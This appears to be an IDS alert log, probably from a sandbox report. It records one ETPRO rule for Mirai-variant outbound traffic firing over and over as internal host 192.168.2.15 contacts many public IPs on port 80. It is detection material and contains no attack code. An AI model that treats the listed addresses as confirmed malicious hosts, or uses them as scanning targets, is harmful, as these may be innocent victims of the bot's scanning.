ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.240.143

Timestamp:	192.168.2.1595.216.240.14335680802839471 02/14/24-09:29:24.661179
SID:	2839471
Source Port:	35680
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.58.72.215

Timestamp:	192.168.2.1595.58.72.21538812802839471 02/14/24-09:30:59.762543
SID:	2839471
Source Port:	38812
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.86.81.60

Timestamp:	192.168.2.1595.86.81.6052832802839471 02/14/24-09:30:48.149472
SID:	2839471
Source Port:	52832
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.35.40.90

Timestamp:	192.168.2.1595.35.40.9057198802839471 02/14/24-09:28:56.307430
SID:	2839471
Source Port:	57198
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.147.150.44

Timestamp:	192.168.2.1588.147.150.4442840802839471 02/14/24-09:30:08.412746
SID:	2839471
Source Port:	42840
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.80.219.174

Timestamp:	192.168.2.1595.80.219.17451486802839471 02/14/24-09:29:56.726004
SID:	2839471
Source Port:	51486
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.100.248

Timestamp:	192.168.2.1588.221.100.24851888802839471 02/14/24-09:30:03.422935
SID:	2839471
Source Port:	51888
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.124.32.56

Timestamp:	192.168.2.15112.124.32.5657990802839471 02/14/24-09:30:04.967124
SID:	2839471
Source Port:	57990
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.4.176

Timestamp:	192.168.2.1588.221.4.17653670802839471 02/14/24-09:30:26.259209
SID:	2839471
Source Port:	53670
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.47.11.210

Timestamp:	192.168.2.15112.47.11.21053612802839471 02/14/24-09:29:05.762313
SID:	2839471
Source Port:	53612
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.66.132.13

Timestamp:	192.168.2.1595.66.132.1335420802839471 02/14/24-09:29:42.765276
SID:	2839471
Source Port:	35420
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.79.100.40

Timestamp:	192.168.2.1595.79.100.4034114802839471 02/14/24-09:30:14.762774
SID:	2839471
Source Port:	34114
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.149.181.115

Timestamp:	192.168.2.1588.149.181.11556704802839471 02/14/24-09:28:46.591603
SID:	2839471
Source Port:	56704
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.67.8.239

Timestamp:	192.168.2.1595.67.8.23960210802839471 02/14/24-09:30:06.552746
SID:	2839471
Source Port:	60210
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.226.52

Timestamp:	192.168.2.1595.100.226.5242386802839471 02/14/24-09:30:24.466282
SID:	2839471
Source Port:	42386
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.182.224

Timestamp:	192.168.2.1595.100.182.22458762802839471 02/14/24-09:29:24.857767
SID:	2839471
Source Port:	58762
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.203.250.100

Timestamp:	192.168.2.1588.203.250.10053678802839471 02/14/24-09:29:44.339565
SID:	2839471
Source Port:	53678
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.124.146

Timestamp:	192.168.2.1595.216.124.14643754802839471 02/14/24-09:30:48.383690
SID:	2839471
Source Port:	43754
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.133.224

Timestamp:	192.168.2.1595.217.133.22457376802839471 02/14/24-09:29:38.541946
SID:	2839471
Source Port:	57376
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.119.167.115

Timestamp:	192.168.2.1588.119.167.11553226802839471 02/14/24-09:28:46.591804
SID:	2839471
Source Port:	53226
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.85.71.191

Timestamp:	192.168.2.1595.85.71.19159590802839471 02/14/24-09:29:24.925955
SID:	2839471
Source Port:	59590
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.110.208.137

Timestamp:	192.168.2.1595.110.208.13752208802839471 02/14/24-09:29:56.739664
SID:	2839471
Source Port:	52208
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.138.144.217

Timestamp:	192.168.2.1595.138.144.21753080802839471 02/14/24-09:30:19.384540
SID:	2839471
Source Port:	53080
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.196.74.193

Timestamp:	192.168.2.15112.196.74.19359552802839471 02/14/24-09:29:03.444660
SID:	2839471
Source Port:	59552
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.83.36.62

Timestamp:	192.168.2.15112.83.36.6245418802839471 02/14/24-09:30:36.980156
SID:	2839471
Source Port:	45418
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.198.144.142

Timestamp:	192.168.2.1588.198.144.14234420802839471 02/14/24-09:30:26.486090
SID:	2839471
Source Port:	34420
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.79.101.54

Timestamp:	192.168.2.1595.79.101.5458964802839471 02/14/24-09:29:09.728994
SID:	2839471
Source Port:	58964
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.168.50.100

Timestamp:	192.168.2.15112.168.50.10039236802839471 02/14/24-09:29:03.691469
SID:	2839471
Source Port:	39236
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.59.50.19

Timestamp:	192.168.2.1595.59.50.1939022802839471 02/14/24-09:29:38.813057
SID:	2839471
Source Port:	39022
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.211.212.40

Timestamp:	192.168.2.1595.211.212.4053772802839471 02/14/24-09:30:59.478488
SID:	2839471
Source Port:	53772
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.160.150

Timestamp:	192.168.2.1595.216.160.15060372802839471 02/14/24-09:29:35.305382
SID:	2839471
Source Port:	60372
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.175.213

Timestamp:	192.168.2.1595.101.175.21351628802839471 02/14/24-09:30:48.297254
SID:	2839471
Source Port:	51628
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.191.242

Timestamp:	192.168.2.1595.100.191.24239406802839471 02/14/24-09:30:59.704532
SID:	2839471
Source Port:	39406
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.185.37

Timestamp:	192.168.2.1595.100.185.3740624802839471 02/14/24-09:29:15.215315
SID:	2839471
Source Port:	40624
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.115.168

Timestamp:	192.168.2.1595.216.115.16842972802839471 02/14/24-09:30:48.373876
SID:	2839471
Source Port:	42972
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.93.49

Timestamp:	192.168.2.1595.216.93.4944210802839471 02/14/24-09:29:24.436194
SID:	2839471
Source Port:	44210
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.154.226

Timestamp:	192.168.2.1595.216.154.22659490802839471 02/14/24-09:30:41.261433
SID:	2839471
Source Port:	59490
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.79.31.246

Timestamp:	192.168.2.1595.79.31.24633940802839471 02/14/24-09:30:53.704867
SID:	2839471
Source Port:	33940
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.215.242.21

Timestamp:	192.168.2.1595.215.242.2152620802839471 02/14/24-09:28:47.609966
SID:	2839471
Source Port:	52620
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.87.47

Timestamp:	192.168.2.1595.217.87.4746680802839471 02/14/24-09:29:38.542183
SID:	2839471
Source Port:	46680
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.169.26.226

Timestamp:	192.168.2.1595.169.26.22634884802839471 02/14/24-09:30:33.911087
SID:	2839471
Source Port:	34884
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.213.39.95

Timestamp:	192.168.2.15112.213.39.9534188802839471 02/14/24-09:29:27.776716
SID:	2839471
Source Port:	34188
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.32.110.170

Timestamp:	192.168.2.1588.32.110.17057918802839471 02/14/24-09:29:42.295082
SID:	2839471
Source Port:	57918
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.58.194.58

Timestamp:	192.168.2.1595.58.194.5851742802839471 02/14/24-09:30:10.328928
SID:	2839471
Source Port:	51742
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.30.175.165

Timestamp:	192.168.2.15112.30.175.16553522802839471 02/14/24-09:29:03.417771
SID:	2839471
Source Port:	53522
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.127.197

Timestamp:	192.168.2.1588.221.127.19752636802839471 02/14/24-09:30:26.255701
SID:	2839471
Source Port:	52636
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.142.35.91

Timestamp:	192.168.2.1595.142.35.9154212802839471 02/14/24-09:30:10.010975
SID:	2839471
Source Port:	54212
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.221.199.108

Timestamp:	192.168.2.1595.221.199.10835078802839471 02/14/24-09:28:56.286077
SID:	2839471
Source Port:	35078
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.43.238.159

Timestamp:	192.168.2.1595.43.238.15938722802839471 02/14/24-09:30:55.714628
SID:	2839471
Source Port:	38722
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.68.46.234

Timestamp:	192.168.2.1595.68.46.23459204802839471 02/14/24-09:30:24.482803
SID:	2839471
Source Port:	59204
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.197.165.134

Timestamp:	192.168.2.15112.197.165.13456052802839471 02/14/24-09:29:03.449616
SID:	2839471
Source Port:	56052
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.86.112.120

Timestamp:	192.168.2.1595.86.112.12039662802839471 02/14/24-09:30:29.871939
SID:	2839471
Source Port:	39662
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.208.204

Timestamp:	192.168.2.1595.216.208.20443462802839471 02/14/24-09:31:13.060820
SID:	2839471
Source Port:	43462
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.236.46

Timestamp:	192.168.2.1595.217.236.4644412802839471 02/14/24-09:29:29.700847
SID:	2839471
Source Port:	44412
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.171.185.101

Timestamp:	192.168.2.15112.171.185.10138516802839471 02/14/24-09:29:36.795584
SID:	2839471
Source Port:	38516
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.86.111.177

Timestamp:	192.168.2.1595.86.111.17755042802839471 02/14/24-09:30:37.233959
SID:	2839471
Source Port:	55042
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.96.62.214

Timestamp:	192.168.2.1588.96.62.21437116802839471 02/14/24-09:30:03.395436
SID:	2839471
Source Port:	37116
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.78.232.113

Timestamp:	192.168.2.1595.78.232.11339258802839471 02/14/24-09:30:24.712098
SID:	2839471
Source Port:	39258
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.165.230.10

Timestamp:	192.168.2.1595.165.230.1047848802839471 02/14/24-09:30:19.435955
SID:	2839471
Source Port:	47848
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.135.211.255

Timestamp:	192.168.2.15112.135.211.25543794802839471 02/14/24-09:28:47.121988
SID:	2839471
Source Port:	43794
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.158.120.208

Timestamp:	192.168.2.15112.158.120.20859996802839471 02/14/24-09:31:09.292148
SID:	2839471
Source Port:	59996
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.0.98.88

Timestamp:	192.168.2.1595.0.98.8853598802839471 02/14/24-09:29:56.976905
SID:	2839471
Source Port:	53598
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.99.29.249

Timestamp:	192.168.2.1588.99.29.24933758802839471 02/14/24-09:29:32.010329
SID:	2839471
Source Port:	33758
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.85.26.17

Timestamp:	192.168.2.1595.85.26.1732844802839471 02/14/24-09:30:52.921987
SID:	2839471
Source Port:	32844
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.90.95.73

Timestamp:	192.168.2.15112.90.95.7346424802839471 02/14/24-09:31:06.192447
SID:	2839471
Source Port:	46424
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.165.139.210

Timestamp:	192.168.2.1595.165.139.21060806802839471 02/14/24-09:28:47.591618
SID:	2839471
Source Port:	60806
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.90.88.90

Timestamp:	192.168.2.15112.90.88.9033838802839471 02/14/24-09:30:11.038672
SID:	2839471
Source Port:	33838
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.198.38.79

Timestamp:	192.168.2.1588.198.38.7944240802839471 02/14/24-09:30:31.340101
SID:	2839471
Source Port:	44240
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.210.96.55

Timestamp:	192.168.2.1595.210.96.5533542802839471 02/14/24-09:29:24.411294
SID:	2839471
Source Port:	33542
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.177.57.8

Timestamp:	192.168.2.15112.177.57.839686802839471 02/14/24-09:29:48.325813
SID:	2839471
Source Port:	39686
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.30.50

Timestamp:	192.168.2.1595.216.30.5058040802839471 02/14/24-09:30:14.753452
SID:	2839471
Source Port:	58040
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.41.52

Timestamp:	192.168.2.1595.216.41.5258672802839471 02/14/24-09:30:19.416264
SID:	2839471
Source Port:	58672
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.149.42

Timestamp:	192.168.2.1595.100.149.4249860802839471 02/14/24-09:31:17.899931
SID:	2839471
Source Port:	49860
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.203.69

Timestamp:	192.168.2.1595.100.203.6955932802839471 02/14/24-09:28:56.038983
SID:	2839471
Source Port:	55932
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.140.64

Timestamp:	192.168.2.1595.216.140.6458794802839471 02/14/24-09:29:42.743456
SID:	2839471
Source Port:	58794
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.78.210

Timestamp:	192.168.2.1588.221.78.21058378802839471 02/14/24-09:28:46.581700
SID:	2839471
Source Port:	58378
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.124.165.108

Timestamp:	192.168.2.15112.124.165.10839986802839471 02/14/24-09:29:54.239906
SID:	2839471
Source Port:	39986
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.111.242.79

Timestamp:	192.168.2.1595.111.242.7943940802839471 02/14/24-09:30:19.400442
SID:	2839471
Source Port:	43940
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.249.66.46

Timestamp:	192.168.2.1588.249.66.4644304802839471 02/14/24-09:30:19.848334
SID:	2839471
Source Port:	44304
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.78.69

Timestamp:	192.168.2.1595.101.78.6946436802839471 02/14/24-09:30:14.535525
SID:	2839471
Source Port:	46436
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.174.28.164

Timestamp:	192.168.2.1595.174.28.16435644802839471 02/14/24-09:30:37.193511
SID:	2839471
Source Port:	35644
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.173.124

Timestamp:	192.168.2.1595.216.173.12433430802839471 02/14/24-09:29:15.246798
SID:	2839471
Source Port:	33430
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.13.121.101

Timestamp:	192.168.2.15112.13.121.10151742802839471 02/14/24-09:30:03.594758
SID:	2839471
Source Port:	51742
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.197.81.187

Timestamp:	192.168.2.15112.197.81.18759498802839471 02/14/24-09:29:48.436887
SID:	2839471
Source Port:	59498
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.86.125.199

Timestamp:	192.168.2.1595.86.125.19951396802839471 02/14/24-09:30:59.785772
SID:	2839471
Source Port:	51396
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.56.209.43

Timestamp:	192.168.2.1595.56.209.4359496802839471 02/14/24-09:29:15.309796
SID:	2839471
Source Port:	59496
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.168.102.29

Timestamp:	192.168.2.15112.168.102.2948300802839471 02/14/24-09:29:26.534411
SID:	2839471
Source Port:	48300
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.179.193.100

Timestamp:	192.168.2.1595.179.193.10038656802839471 02/14/24-09:30:11.612228
SID:	2839471
Source Port:	38656
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.66.166

Timestamp:	192.168.2.1595.100.66.16658512802839471 02/14/24-09:30:59.454642
SID:	2839471
Source Port:	58512
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.47.167.65

Timestamp:	192.168.2.1595.47.167.6552484802839471 02/14/24-09:28:47.589849
SID:	2839471
Source Port:	52484
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.147.5.63

Timestamp:	192.168.2.1588.147.5.6334948802839471 02/14/24-09:29:15.554778
SID:	2839471
Source Port:	34948
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.10.162.12

Timestamp:	192.168.2.1588.10.162.1247362802839471 02/14/24-09:29:38.317134
SID:	2839471
Source Port:	47362
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.136.40

Timestamp:	192.168.2.1595.100.136.4034484802839471 02/14/24-09:29:56.539233
SID:	2839471
Source Port:	34484
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.34.18

Timestamp:	192.168.2.1588.221.34.1853612802839471 02/14/24-09:30:21.250100
SID:	2839471
Source Port:	53612
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.201.148

Timestamp:	192.168.2.1595.101.201.14860120802839471 02/14/24-09:28:47.570065
SID:	2839471
Source Port:	60120
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.83.37.177

Timestamp:	192.168.2.15112.83.37.17739940802839471 02/14/24-09:30:16.369828
SID:	2839471
Source Port:	39940
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.57.108.51

Timestamp:	192.168.2.1595.57.108.5152274802839471 02/14/24-09:29:09.207734
SID:	2839471
Source Port:	52274
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.37.31

Timestamp:	192.168.2.1588.221.37.3152232802839471 02/14/24-09:30:43.927469
SID:	2839471
Source Port:	52232
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.25.57.43

Timestamp:	192.168.2.15112.25.57.4354648802839471 02/14/24-09:31:01.795046
SID:	2839471
Source Port:	54648
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

